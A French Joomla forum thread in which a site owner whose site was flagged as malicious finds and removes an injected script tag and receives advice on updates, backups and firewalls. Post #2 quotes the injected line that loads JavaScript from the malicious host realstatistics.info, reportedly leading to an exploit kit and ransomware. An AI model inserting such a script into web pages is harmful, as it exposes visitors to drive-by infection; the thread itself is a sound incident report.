Mon site est devenu "malveillant" a cause de "realstatistic.info"

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Mon site est devenu "malveillant" a cause de "realstatistic.info"

    Bonjour,

    Je ne viens pas souvent ici car mon expérience sur joomla est assez restreinte, mais la j'avoue que je viens chercher de l'aide.

    Je possède donc un petit site "carte de visite" sur lequel je ne me connecte pas très souvent.
    Je me suis connecté hier pour faire une petite mise à jour et en profiter pour régler un léger détail, et paf, quelques heures plus tard quand je vais sur mon site, à la place de vois une énorme page rouge avec écrit :

    Le site Web que vous allez ouvrir contient un logiciel malveillant

    Les individus malveillants actuellement à l'œuvre sur le site realstatistics.info pourraient tenter d'installer des programmes dangereux sur votre ordinateur, de manière à récupérer vos informations (par exemple des photos, des mots de passe, des messages et des numéros de carte de paiement) sans votre autorisation, ou à les supprimer.


    A savoir que je ne sais absolument pas ce qu'est ce realstatistics.info, mais j'ai remarqué hier dans l'après midi quand je faisait quelques réglages, qu'a certains moment le chargement de mes pages était un peu long et que je voyais "en attente de realstatistics.info" dans la barre en bas a gauche..Je n'y ai pas vraiment preté attention, mais la cette grande page rouge me fait flipper ...

    Deja pour l'image c'est vraiment moche, mais en plus j'ai cherché un peu sur google et je suis tombé sur un post qui parle de "rig exploit", "neutrino EK" ou de "cerber" qui crypte tous les fichiers du disque dur infecté et qui propose de les decrypter contre de l'argent j'imagine...
    bref, pas cool

    Quelqu'un aurait l'amabilité de m'aiguiller sur ce qu'il faut faire dans ce genre de cas et si cette alerte est vraiment grave ?

    Merci d'avance !!
    Dernière édition par Poire à 01/07/2016, 22h27

  • #2
    Re : Mon site est devenu "malveillant" a cause de "realstatistic.info"..

    Bon alors je m'auto répond.

    Après avoir passé une partie de la nuit et matinée à chercher à comprendre, apparement mon site a été victime d'une "injection php".
    Dans mon index.php situé dans mon dossier templates, j'ai trouvé cette ligne à la fin de la balise head :

    <script language="JavaScript" src="http://realstatistics.info/js/analytic.php?id=4"></script>
    J'ai cherché et apparement cette ligne est une sorte de "backdoor" qui permet au pirate d'utiliser ensuite un "rig exploit"(pas trop compris ce que c'était mais c'est une ******rie..) et d'envoyer un "ransomware" sur l'ordi, à comprendre une sorte de virus qui crypte toutes les données du disque dur et demande une rançon pour pouvoir tout decrypter. (genre dans les 500$ minimum d'après ce que j'ai lu, à payer en bitcoin)
    En gros, quelque chose à ne vraiment pas prendre à la légère.

    J'ai vu ces informations ici et qui datent du 25 juillet, donc c'est tout frais apparement.


    J'espère que cette information pourra aider certains, car je n'ai trouvé aucun post à ce sujet via google.



    J'aimerai toutefois avoir vos avis à propos de 2 ou 3 points.

    - Comment me suis je retrouvée avec du code injecté alors que je n'ai que très peu d'activité sur mon site ? je me connecte de temps en temps pour faire les mises à jours et rajouter quelques photos juste..

    - J'imagine que cette merde peut revenir ? y'aurait-il un moyen de prévenir cela ?

    - Le fait que j'ai eu cette ligne de code sur mon site pendant quelques heures a t-il pu avoir des conséquences sur ma sécurité ? (site, ftp, pc perso..), sachant que je me suis connecté dessus malgré l'avertissement pour voir ce qui se passait...

    re merci d'avance et en espérant que mon post puisse éviter à certains de se retrouver dans la mouise

    Commentaire


    • #3
      Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;..

      Bonjour,

      Il y a eu une attaque généralisée depuis mi-décembre, suite à une faille de sécurité http://www.cert.ssi.gouv.fr/site/CER...013/index.html. Elle est toujours en cours car je vois presque tous les jours des tentatives d'intrusion avec les "JDatabaseDriverMysqli" dans mes logs.

      Donc, quelle est votre version Joomla ? avez-vous des sauvegardes ?

      En gros, il va falloir nettoyer et, si vous faites une recherche avec le mot "Virus" rien que sur le mois dernier, on a déjà traité le sujet une bonne quinzaine de fois http://forum.joomla.fr/search.php?searchid=3552049 dont la discussion http://forum.joomla.fr/showthread.ph...ighlight=virus qui peut certainement vous aider.

      Pascal
      If anything can go wrong, it will...If I can help, I will ..https://conseilgouz.com

      Commentaire


      • #4
        Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;..

        Bonjour, merci pour la réponse rapide.

        J'ai fait ma mise à jour de joomla hier dans l'après midi, j'étais à la version 3.45..sachant que l'alerte est arrivée quelques heures après.

        J'ai une sauvegarde clean (j'ai vérifié) qui date de novembre 2015, je n'ai quasiment rien changé depuis cette date, à part la mise à jour de joomla donc. (par contre vu que mon site est petit, je fait mes sauvegardes à la "barbare", je prend le dossier www de mon ftp et je le met dans un coin sur mon pc au cas ou, ça pose pas de problème normalement en cas de backup non ?)

        J'avais vu le post de Explo effectivement (qui est encore en 1ere page il me semble), mais je n'étais vraiment sur qu'il s'agissait du meme probleme..j'ai donc préféré faire un nouveau post au cas ou effectivement.
        D'après ce que j'ai lu sur ce post et sur http://www.cert.ssi.gouv.fr/site/CER...013/index.html, le plus simple reste donc de remettre un backup clean je vois.
        Y'a t'il quelque chose d'autre à faire que les mises a jour joomla pour éviter ce genre de scénario ?
        Dernière édition par Poire à 30/06/2016, 07h48

        Commentaire


        • #5
          Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;..

          Autre petit détail, dans mes logs je ne vois pas de "JDatabaseDriverMysqli" ni aucune IP indiquée pour ce type d'attaque, je vois uniquement des attaques en brute force pour trouver mon log admin. (classique j'imagine)

          Donc je pense que c'est un autre type d'attaque, une injection php "toute bete", mais aucune idée de comment ça m'est arrivé et si ça risque de revenir après la maj..

          Commentaire


          • #6
            Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;..

            Bonjour

            Plusieurs erreurs dans ta gestion :

            * Tu as omis de mettre à jour Joomla vers 3.5.x. La version 3.4.5 date du 22 octobre soit, euh, 8 mois de retard. C'est beaucoup trop d'autant plus qu'entretemps, il y a eu une grosse faille colmatée (fin décembre 2015). Il est *primordial* d'au minimum installer les versions qui colmatent des trous de sécurité.

            * Tu fais tes backups "à l'arrache" : tu copies les fichiers, okido, mais tu le fais "parfois" et surtout tu ne prends même pas un backup de la base de données. Pourquoi refuser la simplicité offerte par Akeeba Backup qui est déconcertante et gratuite ?

            * J'ai l'impression que tu n'as pas de sécurité en place pour ton site; intéresse-toi à ce que nomme les parefeu, il en existe plein pour Joomla dont RS firewall, AdminTools, aeSecure, etc.

            JDatabaseDriverMysqli est justement un type d'attaque qui a sévi fin 2015 et qui a été la raison de la mise en download de Joomla 3.4.8. Sur un serveur ayant une vieille version de PHP, il y avait une attaque rendue possible par l'instruction session_decode, native de PHP, qui autorisait l'exécution de code PHP et donc rendant ton site vulnérable.

            Bonne journée.
            Christophe (cavo789)
            Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
            Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

            Commentaire


            • #7
              Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;..

              Merci pour ta réponse complète !

              Effectivement mon site je bouge quasiment pas, donc des fois il se passe plusieurs mois sans que je pense à faire les mises à jours..c'est une erreur bete de ma part la.

              J'ai eu une expérience malheureuse avec Akeeba, lorsque j'ai voulu faire il y'a pas mal de temps la migration joomla 2.5 vers 3.x
              Il y'avait des chances pour que la mise à jour échoue et fasse planter le site avec toutes les incompatibilités.
              J'ai donc essayé de faire un backup avec akeeba, j'ai fait la mise à jour...qui à planté..et au moment de remettre le backup, tout à foiré et pour faire simple j'ai du refaire quasiment mon site de A à Z...heureusement que c'est un petit site parce qu'avec un gros ça aurait été catastrophique. (ceci dit j'aurai peut etre pas pris le risque comme ça).

              Je regarderai pour les firewall effectivement merci, ça peut pas faire de mal.

              Par contre pour JDatabaseDriverMysqli, j'ai bien regardé mes logs (error.php et joomla_update.php) et je ne l'ai vu nulle part..j'ai du etre épargné je pense. (vais pas me plaindre)

              Commentaire


              • #8
                Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;..

                Je poste juste un détail au cas ou ça arrive à d'autres.

                Je me suis aperçu que mon site tournais sur PHP 5.3.29, étant donné que je suis sur un mutualisé ovh depuis des années et que je n'avais jamais upgradé la version PHP (je pensais que ça le faisait tout seul).
                Mon injection php viens peut être de ça étant donné que cette version est carrément dépassée.

                Commentaire


                • #9
                  Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;

                  Bonjour

                  Il y a plusieurs mois maintenant, j'ai longuement expliqué le souci avec l'attaque JDatabaseDriverMysqli : j'ai envoyé une newsletter à mes utilisateurs. Cette NL est disponible ici : https://www.aesecure.com/fr/?option=...tmpl=component

                  Il est impératif de suivre l'évolution des versions de Joomla lorsqu'il s'agit de mises-à-jour de sécurité et, ici, faire en sorte de ne pas rester sur des vieilles versions de PHP.

                  Bonne journée.
                  Christophe (cavo789)
                  Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                  Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                  Commentaire


                  • #10
                    Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;

                    J'ai mis un backup et fait les mises à jour de joomla et de php hier, je viens de passer le scan aesecure et tout semble être clean maintenant merci

                    J'ai regardé mes logs via OVH également (j'ignorais que ça existait, je pensait que le fichier de log etait le error.txt stocké dans le site...), et ça faisait genre 6/7 mois que je prenais des attaques JDatabaseDriverMysqli, sans conséquences heureusement (et c'est pas comme si y'avait quelque chose à "hacker" sur mon site en meme temps..)

                    Commentaire


                    • #11
                      Re : Mon site est devenu &quot;malveillant&quot; a cause de &quot;realstatistic.info&quot;

                      Si c'est réglé merci de l'indiquer :
                      Lorsque l'on se cogne la tête contre un pot et que cela sonne creux, ça n'est pas forcément le pot qui est vide.
                      Confucius

                      Commentaire

                      Annonce

                      Réduire
                      Aucune annonce pour le moment.

                      Partenaire de l'association

                      Réduire

                      Hébergeur Web PlanetHoster
                      Travaille ...
                      X